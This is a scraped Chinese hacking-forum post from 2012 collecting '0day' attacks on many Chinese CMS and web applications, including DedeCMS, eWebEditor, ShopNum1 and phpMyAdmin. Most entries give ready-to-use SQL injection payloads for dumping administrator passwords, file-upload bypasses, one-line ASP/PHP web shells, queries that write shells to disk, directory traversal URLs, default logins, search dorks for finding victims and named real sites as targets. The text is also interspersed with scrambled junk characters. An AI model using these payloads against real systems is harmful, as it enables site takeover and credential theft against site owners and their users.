找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3059|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本+ l2 K  p/ n! S" a1 f$ c) d0 }

. K* J! o& F1 J: V. [: D直接上exploit:
4 F0 k/ g  L! g. F& i4 |" ]javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
* k1 w* }# q4 Xtest:http://www.tb11.net/system/xitong/shownews.asp?id=210( h% S+ E0 M0 A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 E4 t  u5 Z7 q8 D1 [5 X/ G$ PAsprain论坛 注册用户 上传图片就可拿到webshell0 \+ ]) w- g  {, z5 K, L4 i7 c
% q; B0 o  W, }
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
$ Q# [$ V+ C) p2 o% [  e1.txt存放你的一句话马 如:<%execute(request("cmd"))%>( b/ }( y  |7 G' z; a: M  u
2.gif 为一小图片文件,一定要小,比如qq表情图片
' O- G2 ^5 N) B3 v+ f4 J3 z* b3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
3 D' D0 `4 c) Z/ j" ?4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了* i* x  V9 U% |! v3 R0 a
5.q.asp;.gif
8 ?3 W3 a8 n  t5 b* [% q3 o$ y+ dgoogle:Powered by Asprain) J. H- @5 r/ @* B) W+ ~& }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. ^, z0 a0 V8 w$ `) A5 U
' t2 a3 ^6 D9 r7 \: {1 ]3 _2 v4 |
ShopNum1全部系统存在上传漏洞。6 r$ b( L% V$ N5 a0 K3 i

4 D0 K& h" |4 k2 w2 L* p# y: F首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。9 d. p) c. i) d6 }6 c- g8 K6 y' P  l
按说明 提示登录后台。。9 X; }9 [$ E; }+ {( {
在后台功能页面->附件管理->附件列表
8 w: v5 z0 q# n可以直接上传.aspx 后缀木马
% C6 F6 U1 [! Dhttp://demo.shopnum1.com/upload/20110720083822500.aspx0 @8 j# \2 r/ x- I, K: R* L1 W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; |  l4 K2 n1 V6 e
! h" L" V' L0 x/ b牛牛CMS中小企业网站管理系统 上传漏洞
" t, L7 E$ H4 d, Z5 b, b
% b" |" M& t0 `& _6 n牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
- `, s1 K5 d, T9 O$ N1 \' K后台:admin/login.asp6 R( a" |  }; u* I0 q' @
ewebeditor 5.5 Nday* q1 @4 I6 I/ B$ w: ~" B/ \' G
exp:
( ^! v, x* E- U, w. x<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?6 z# w8 X2 v# z3 D/ H
<input?type=file?name=uploadfile?size=100><br><br>?
. k$ d- n8 x. J. c( n+ X<input?type=submit?value=upload>?, N7 q; `; ]% F
</form>% u( {7 I) X( O/ D0 L
ps:先上传小马.( h4 ]. Q7 V" l3 `
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
+ a5 k9 L+ o% f. ]) P2 t  L
' A. D. u. d0 k+ p) s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ m# g: @! L1 W4 b: z+ ~, F9 _& j

: Z0 K3 M: X( [* M, j* cYothCMS 遍历目录漏洞
5 P; A& \: r9 I0 m8 g7 M* K5 e9 `& o$ K( U! j0 c
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
8 m1 b4 K$ t- |默认后台:admin/login.asp0 m& l1 I' B  v0 p9 M3 v
遍历目录:
' u. D- [& h% U: o* jewebeditor/manage/upload.asp?id=1&dir=../0 C5 K' F6 ^7 I6 g+ i. g2 E
data:, ]- {5 j3 u  D% E3 F+ _' T# ^" A, g
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa# W6 V# a; {0 ?$ w4 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' I, x2 x+ ?& O# g+ @- d3 j

# Z% K+ V0 G7 B* i& o8 VNet112企业建站系统 1.06 i% g% m& z0 Q$ y/ w8 j: ~! L
, [) w7 g, r, A. X# I% z
源码简介:
* c# p7 m* ^0 V$ P1 xNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。1 m% z1 B, ?$ t/ q$ H2 r3 C
添加管理员:& P- _# U! c& o% g. [, }& q3 ^
http://www.0855.tv/admin/admin.asp?action=add&level=2
* U  \% K- D9 p" L! x其实加不加都不是很重要,后台文件都没怎么作验证。' R9 K! K8 U) `6 {% x7 H3 _' u
上传路径:
  A, x5 W5 z5 ^; {+ p4 w3 j6 \http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
' n6 W# x- J; h) D0 }/ o& ghttp://www.0855.tv/inc/Upfile.asp?Stype=2
7 k* D5 r& V0 d% N怎么利用自己研究。
; I7 H1 T( A% K遍历目录:
, ^3 e6 a7 p/ i9 ~# x" mhttp://www.0855.tv/admin/upfile.asp?path=../..
1 Q4 `) m7 S% s$ V( s  ]/ @8 i如:% `- O& k% C$ w/ x' P$ J8 ]
http://www.0855.tv/admin/upfile.asp?path=../admin
2 N+ k9 X; G( d5 H( q) \: Mhttp://www.0855.tv/admin/upfile.asp?path=../data. Y0 r3 _1 |3 k  G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ L$ J4 i& a3 ~. x  E$ L* c' m# C# m; K" `& C4 ]8 i: ^0 u) b
易和阳光购物商城通杀 上传漏洞
) O1 L5 U- h! L# U7 w8 a' o% P9 Z+ v
前提要求是IIS6.0+asp坏境。
0 N& F9 ^, L4 `漏洞文件Iheeo_upfile.asp - T* o. \5 }4 @. R
过滤不严.直接可以iis6.0上传$ t0 _  O# m7 G8 ~3 K. E
把ASP木马改成0855.asp;1.gif
% l. |9 t( c" I& ^直接放到明小子上传# f5 u0 b" \4 W& [9 d% y3 c
Google搜索:inurl:product.asp?Iheeoid=
9 |+ \# O2 v4 m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% R8 }5 P" R( ]$ d
; z: P  ?  k5 {' |% gphpmyadmin后台4种拿shell方法% X8 ]' p8 |/ p0 H) q; F
7 a& K# t, `6 i9 K
方法一:
4 u5 S8 m' r$ M4 {9 N: Y# t) E( ICREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );# Q$ r% e' @7 G$ U# Z  u' b! f
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');# e) P0 V7 o: z/ |2 r- {' [
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';; y: w8 ]& F8 F9 j; @) H+ s
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
" {) D* F& c) k( N一句话连接密码:xiaoma5 A- u8 |0 M1 s5 K2 J
方法二:' j6 f, q# I) P1 @# F& p) J" A8 S2 |) L
Create TABLE xiaoma (xiaoma1 text NOT NULL);3 B  ?7 r. ^' I# n0 X( B
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
  T$ X' i6 D. g. f+ V7 d4 pselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';% J' y  {. C& A) I
Drop TABLE IF EXISTS xiaoma;
3 u1 U8 x6 Y2 U; ~  R" `' J+ Y方法三:; l8 V7 d' X( {# j9 B( [! W9 t
读取文件内容:    select load_file('E:/xamp/www/s.php');
! i" A( O1 V/ M, ?$ H% n写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 C" [3 \. m5 {5 k9 W( b6 Qcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php': _3 y" \6 K, [, j
方法四:
- j+ U$ X1 L3 I% ~& t2 z& l0 R, rselect load_file('E:/xamp/www/xiaoma.php');
3 C0 c$ t3 l5 h" y/ iselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'$ q* e  D6 j0 N% P3 F1 ?
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir9 W% u+ ~0 O6 v1 j: W) Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* w4 z, a( q0 p6 F8 T% L' r
7 X4 F# k% K" q传信网络独立开发网站源码0day漏洞
0 h% {2 Q, c/ c; ?1 _2 W* g4 t' G6 h$ }7 B) E' R
后台system/login.asp6 D* M' d2 q' C
进了后台有个ewebeditor
4 h4 C, Z5 }; d& D1 h$ \Google 搜索inurl:product1.asp?tyc=
% U3 K- }/ P7 S编辑器漏洞默认后台ubbcode/admin_login.asp5 k( U/ w  }: x7 w* _" z" v
数据库ubbcode/db/ewebeditor.mdb# _6 U8 B" t# W; M
默认账号密码yzm 111111
( g- `: o. i: D5 b: o9 W9 c9 |; m, s
拿webshell方法
: c$ e! M# {& q登陆后台点击“样式管理”-选择新增样式 4 B, \" N# Z" r" J+ S
样式名称:scriptkiddies 随便写
6 {6 q. Z& G- m: G路径模式:选择绝对路径
' D& \+ K: g. b图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx3 O& q' s7 Z4 R) }
图片类型比如就是我们要上传的ASP木马格式
3 \4 n( P( m2 ?- C8 Q上传路径:/
5 `- X* M0 F9 H) Z: Q图片限制:写上1000 免的上不了我们的asp木马
; t; l: a- t9 E! E$ g上传内容不要写- F9 @3 h8 r9 J! E, l
可以提交了 # ^6 b# ^7 z. G2 w6 \
样式增加成功! 6 s% I. _& s% L, _& v4 K$ H
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 * n8 d2 X( t) ]
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置7 _; s7 ]8 A5 A% |1 F) r* [* W
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies, o7 B* A3 U/ v, j  d# h4 ?
上ASP木马 回车 等到路径
  O1 G+ i5 q3 G3 @  \: y6 G0 S0 R3 p1 D* r
后台:system/login.asp2 i" p# X( p) ^4 T# d& U7 ]; M3 l
Exp:6 A' F. p  b7 \% s- L7 X
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
. Z$ F1 x5 q# D) \5 Z# f测试:4 W6 Q: h) L' K3 ^
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master: C' U) v( E8 B- D
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master) F$ T/ d; Z* X$ M4 r  G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ D3 f/ `5 f8 q
8 Y! b3 ]: V/ E# |+ J/ a5 d+ k- Gfoosun 0day 最新注入漏洞6 z7 f) Z3 i  L2 v2 k' w! n
2 H2 g. U* t! W8 `0 Q0 i2 Z
漏洞文件:www.xxx.com/user/SetNextOptions.asp) K; M5 u+ T9 ~. N
利用简单的方法:& }/ L' J6 L9 ?3 p# J( B; r9 R
暴管理员帐号:4 q5 h6 a6 i3 Y  N( T' y
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin: n5 @6 T, k: }
暴管理员密码:
( F6 [3 r3 T- n" \# ghttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
4 G  j1 _+ w9 E( O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: u; [7 I, E9 \# e% o
& d" e' U  L+ x+ y  Z* U7 g: f
网站程序的版权未知!
' b7 a' W. P/ C6 F5 o" k6 U8 y9 h) `- L! L+ [; l/ c# o
默认网站数据库:
4 _2 ?$ J, [/ j  X0 A* swww.i0day.com/data/nxnews.mdb  G3 K" u' z! C4 u4 Q* A
ewebeditor 在线编辑器:
3 x( W8 H) |6 o/ K7 P编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
' W! a7 W. W) r% b登录地址:ewebeditor/admin_login.asp- p. f( |+ a" C9 S0 r+ Q' y0 r8 v+ ~
默认密码:admin  admin
* `5 }! H* E9 L登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
6 J3 m& G4 u! [% L; F5 U5 n
; Q5 a. g/ a7 K0 g0 XSql注入漏洞:
+ T9 S7 X( o% _; s. S. ghttp://www.i0day.com/detail.asp?id=12
# E; ^6 [! o/ a4 V' Pexp:6 O( N% M4 `# D
union select 1,admin,password,4,5,6,7,8 from admin
$ Q, r) |* J; {* R: N6 @爆出明文帐号/密码  O7 p) n, M+ {  y) v
3 a* ]; Y4 Q3 D* P7 G& b+ ^* G
上传漏洞:2 n% V0 U: b4 g& F! I
后台+upfile.asp
1 J" F" M: [0 r! n0 ]如:
* A7 Y7 o) S9 o- [% x# j4 Ghttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。3 E. y3 ~- J% O, b+ o
shell的地址:网址+后台+成功上传的马
5 x" f  ?2 E% O- {3 T! J7 rgoogle:inurl:news.asp?lanmuName=
; M; E0 D. a0 l+ @; U7 R2 Q------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& Z# m% C" i; b) l0 v" p9 ]4 T9 A
) w/ Z% O& B* G( D/ f2 @dedecms最新0day利用不进后台直接拿WEBSHELL
% d# E; k) o1 c0 ^& a9 h8 K9 |+ {8 h
拿webshell的方法如下:
8 Z' L. n8 w& F网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
5 E+ i1 V8 f* Y. \$ V前题条件,必须准备好自己的dede数据库,然后插入数据:0 e5 ?3 {' w0 q  H" {% ]5 y. N6 @
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 7 `  q6 @/ W4 k+ \4 z6 Y( u2 L

9 h: h$ W8 g2 R- v再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 r3 O: e3 `+ v; q: k<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
& k4 u* ~: j0 h9 U/ Q<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ m- `- M( s. m1 n9 b1 J
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
' W: A" a* m. I3 A<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />/ R& W( v3 j) K# \. v
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />, A8 U# l+ v$ q, ?( S1 n
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />. `& |" M! o. {1 i
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
, ^4 w  u8 `3 T; h3 i$ I  x<input type="text" value="true" name="nocache" style="width:400">, t3 x6 s! A; C7 c, D
<input type="submit" value="提交" name="QuickSearchBtn"><br />
: t" }4 h3 C9 [/ p0 }) K</form>( v) s6 n5 u2 [9 m: ~: A  l
<script>
" ]# H8 ^2 C  Y0 [+ \1 Wfunction addaction()
3 t' e" c- r8 Y7 y{9 V: [  v6 Q/ I. X, M
document.QuickSearch.action=document.QuickSearch.doaction.value;7 R1 z; Q% H! p8 l2 C
}$ G9 J# C  m8 G- ?( Z
</script>
1 _3 h/ U) q7 q# q* K6 m0 [  R-----------------------------------------------------------------------------------------------------------------------------------------------
' a& Q, D7 g' [9 p( k" N% X& T- A5 Q
; V+ N) S& u, s0 n! a) d$ sdedecms织梦暴最新严重0day漏洞
8 W; c: i1 ?3 k$ S! s  f: abug被利用步骤如下:
) g) a: E% k( A; Phttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root5 }. q# H' ^9 A4 F% V9 ]; ]
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
" x1 [: I0 S& e4 e( B-------------------------------------------------------------------------------------------------------------------------------------------# b% q/ l$ j" d# k+ O, P
. H- V, X7 q$ v8 z4 X
多多淘宝客程序上传漏洞
# b7 k3 [1 u2 S9 w# f  T漏洞页面:
( l0 }) h+ P6 G7 W3 ^0 ?" Nadmin\upload_pic.php
% N! c7 j3 L$ L3 @. ~传送门:
/ I8 z$ R2 c0 Uhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1: E( N6 T: }* @: j) D/ I& p
PS:copy张图片马 直接  xxx.php 上传抓包地址!
  ?+ m4 i' d( w6 b: o- u- B/ i: h------------------------------------------------------------------------------------------------------------------------------------------------------
) u- z8 I* q3 U- q, S" k) k5 u2 O  T) ?6 y( I: I
无忧公司系统ASP专业版后台上传漏洞
: M4 ]. i5 Y* G$ [5 u漏洞文件 后台上传9 z3 }, \# C8 r
admin/uploadPic.asp
% n* ~' G7 e: i$ ]6 k漏洞利用 这个漏洞好像是雷池的
  `1 c  x2 c* Y1 V  Nhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
7 L) X) ~& t) m( R! y, `9 A, j7 e8 |等到的webshell路径:4 ~4 i8 B. h& s0 Z1 i2 o7 |
/UploadFiles/scriptkiddies.asp;_2.gif
/ V) p) y) M5 r+ X4 i---------------------------------------------------------------------------------------------------------------------------------------------------0 u+ c0 f- N, ?$ ^" D* N

9 m2 ~* O7 [( l5 ]住哪酒店分销联盟系统2010$ A1 ^) c2 u! k
Search:" }  ~5 q# D7 k. ^5 H
inurl:index.php?m=hotelinfo! d( L2 Y; ?% o- d) ^8 ]' ?3 o
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin$ B& O7 U0 k% E) D" |
默认后台:index.php?m=admin/login
2 K* E8 R( c$ b$ F--------------------------------------------------------------------------------------------------------------------------------------------------
3 X6 P3 h& ~3 x8 q" O( m' h& |
$ j; Q! T9 Q2 k* c& V" G, ?inurl:info_Print.asp?ArticleID=
- a9 k* X! m+ P0 f3 o后台 ad_login.asp0 r* I3 V0 n! `
爆管理员密码:! u* ~; X# @  X  D, X
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin8 P# E) @* U# D, f  g
------------------------------------------------------------------------------------------------------------------------------------------------------------
! q7 R3 T+ f% J3 t, g1 |% C5 ?  X1 k: s
搜索框漏洞!# S  w7 j$ g1 p# G3 c
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='2 i! l6 F$ \% g' M/ h
--------------------------------------------------------------------------------------------------------------------------------------------------------
$ y  G" o2 ~' C& G: H1 r& a9 S! M# V& {+ Z8 z
关键字:$ T% \# J% |! ?* ]  G
inurl:/reg_TemletSel.asp?step=2  \% q/ O' U- h
或者8 ]! p5 l1 V  m, N
电子商务自助建站--您理想的助手2 D  G2 T: c9 b8 B+ l8 c
-------------------------------------------------------------------------------------------------------------------------------------------------8 K4 l: F% l$ S1 V2 v/ A
" j- `$ T  t- t: H
iGiveTest 2.1.0注入漏洞, w; A4 R9 I- X- E9 f6 p
Version: <= 2.1.05 L- E0 D9 _" T, ^6 r8 i- i
# Homepage: http://iGiveTest.com/
- t$ M5 Z4 g0 g* W0 _* ~3 S; w谷歌关键字: “Powered by iGiveTest”0 z4 b- ^' p; o) K- T
随便注册一个帐号。然后暴管理员帐号和密码/ k% V9 D, F) C( s
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
* u: \) h% K. O3 M------------------------------------------------------------------------------------------------------------------------------------------------5 [8 V+ _( c$ j* P

) `& D8 _( |. B0 C1 OCKXP网上书店注入漏洞
& @+ m  i1 [: }- n& Q工具加表:shop_admin 加字段:admin  T0 n& Z+ P+ g9 m1 o. ?7 P8 a
后台:admin/login.asp
) w! o0 ?; a( I登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/# l" l" U1 `( S: _: \% h. z3 R
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息- M$ \8 t# l9 I( s& g, ~& F& k7 I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 d; @6 w' M: p' }8 n2 F
2 V) |5 b8 r2 I
段富超个人网站系统留言本写马漏洞3 ]  n  @9 e, B. z( F0 O, H7 u. w4 k
源码下载:http://www.mycodes.net/24/2149.htm
* Y7 r& a9 i: y7 Aaddgbook.asp 提交一句话。" v8 ^4 G& B5 W3 ^
连接: http://www.xxxx.tv/date/date3f.asp4 w9 g  P( F3 f3 B) D
google:为防批量,特略!! z% I" c% Y' w. w+ x( l9 Z
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ H3 R3 B: L1 U0 V* }- Z' t
4 ?/ k9 n- _, Y' ]' }( W智有道专业旅游系统v1.0 注入及列目录漏洞7 f- l( y) I% h( j
默认后台路径:/admin/login.asp* m2 p8 {( `2 r1 x: {  f! T/ n
默认管理员:admin
# F, ^+ t, y# q" @$ d- y  H$ J默认密码:123456# K/ L4 \. I1 G2 U) Z6 o
SQL EXP Tset:+ {( {) P7 V# [8 n6 ~$ {
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
8 n* ~( S  x" `0 O8 Y2 k7 n7 E3 u* ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) V' y& z4 u, h3 j" I) R- O2 b% V1 q9 m# |" L' ^
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
7 W1 T  M! X, K6 z. B1 M) GEXP:
5 F' L# U! V+ G5 s* L4 ~<title>eWebeditoR3.8 for php任意文件上EXP</title>- ], p, o0 o" s% H9 q+ l* c4 v. `
<form action="" method=post enctype="multip
. x. ?% n' D: j+ Q' Z  l9 xart/form-data">
8 W& B  o4 M  M<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ; N- ^) I0 a) T/ [  j( H0 s
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> * p6 O: w6 J; J' R( H3 @
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
8 V) q- Y, j$ n: S6 S4 a# mfile:<input type=file name="uploadfile"><br> 5 [0 C/ j7 M/ C6 \. \: r/ [
<input type=button value=submit onclick=fsubmit()>
; Q3 {4 m. }4 `! R" n</form><br> : ^1 J' n( Y: [, W- ^4 i
<script>
: R  F; R& d5 I% t% k3 bfunction fsubmit(){
6 k( U- Y6 ~/ D  x& @3 x6 uform = document.forms[0]; & L& ^1 a9 e4 C: A, _- ]( T, N4 t
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 7 S  ^4 [7 ?. U3 u- F; S2 [2 N5 l
alert(form.action); ; J7 I2 _% ]8 d, D6 ]* w3 _, I% B5 E
form.submit();
0 H* s8 A* r3 o# ~: r/ a} 7 ]/ e9 z# l& w* K
</script>5 X! X& r2 [+ ?7 a8 t3 [8 X
注意修改里面ewebeditor的名称还有路径。3 v7 N0 G* |; }8 F
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 @- C0 e* Y& O3 K& W2 T( h3 k% v5 U" _- K
提交’时提示ip被记录 防注入系统的利用
3 o" Z0 m6 x  Y; z' i1 D网址:http://www.xxx.com/newslist.asp?id=122. E9 u& D$ T: l7 z$ Q
提示“你的操作已被记录!”等信息。- Q$ w! Y% R7 {0 |* h2 w/ K( N
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
; l3 X0 r' p* A3 ~' u+ g% ]-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% g: G! l7 M; ?) z% u: a) [$ z$ o4 I+ k9 n, l; T" Y+ }( o, d
西部商务网站管理系统 批量拿shell-0day" B# O; l$ q/ M4 i
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
' y* N6 F/ z# g1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛: B+ ^# }. {5 v+ C
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合$ \4 M" S4 m& d2 o* U
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂. ~$ d; S" x6 m; r$ b5 I- K/ g
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 @" ]. k$ _& [  j$ L: o

6 \- ]2 [! `" F9 Z# R; CJspRun!6.0 论坛管理后台注入漏洞* s* E( }& E! ^+ Z: P: M

1 P. Y6 j- @* D+ HSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
$ n8 b. ?: z' {1 @$ u, gJspRun!6.0 0 I' v* N2 c. ]$ @% S1 W
漏洞描述:
: `8 v& o: h* w( z/ ?JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
  T# B; I: y8 R, ~在处理后台提交的文件中ForumManageAction.java第1940行* U( P" x( ]2 b) m0 w' P* F
String export = request.getParameter("export");//直接获取,没有安全过滤
! a6 c! e9 D( fif(export!=null){4 L6 F/ u0 U& `# Z; x" D, c# L
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
- G9 Q# ?4 X. {. dif(styles==null||styles.size()==0){) W/ D8 X. _7 j0 }) p$ b5 O
<*参考
2 Q7 `. V% q' I8 F( Q9 i. e: {nuanfan@gmail.com
- w' q6 _$ w0 O2 X- c: ^*> SEBUG安全建议:
' s! J" r& t( N9 B, q* w% q* u* }www.jsprun.net
3 v2 Y# e' w4 p(1)安全过滤变量export
- S" w+ r" c, c2 L$ _, S/ m(2)在查询语句中使用占位符
3 W8 k$ S0 b5 \3 m: ?------------------------------------------------------------------------------------------------------------------------------------------------------------------------------; c; {# S- E9 C. p% ]
9 d; p! p. y* o- ^2 k9 h! e7 b5 J
乌邦图企业网站系统 cookies 注入
2 i# i/ l3 D4 g$ u  E
+ Q( O! o) N4 v2 X程序完整登陆后台:/admin/login.asp5 y9 ~9 u0 N) L# L, W
默认登陆帐号:admin 密码:admin888* V' D* [+ ]- ^
语句:(前面加个空格): z# f$ z; W8 {* p! e7 o/ s, Q6 e
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
' Q( n; ^' q" Q4 v; m6 ^/ o或者是16个字段:
& e  b$ z- S, ~2 |4 F) E! i1 |and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% @3 H; O8 m" _  d  ~" a% P爆不出来自己猜字段。' `  J! L4 H8 e( p' W" q7 K
注入点:http://www.untnt.com/shownews.asp?=88+ Z0 b5 H/ e0 ]) T, t) g
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
8 G% o; G: w  [5 ~( J+ I* J& ~关键字:
( S* Q) R- x0 O. k0 [" S7 W1 _3 Tinurl:shownews?asp.id=
) {5 w5 L& O' `' P-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. ^3 ^  P0 a$ P) g. d, m0 K2 a5 H
$ Z( H# I1 |" O8 \% j
CKXP网上书店注入漏洞% E1 D6 p! M0 w( l2 s6 E& K
5 B: }& {4 M$ Z1 u' W0 H
工具加表:shop_admin 加字段:admin) G2 g5 m3 x7 T' z+ B* E$ m" |& ]
后台:admin/login.asp $ C% G; s; D/ _: I4 j9 Z3 X
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
$ n# w% F% v! }4 V: f3 `inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息! D: ~  @2 {9 g% J9 I6 r
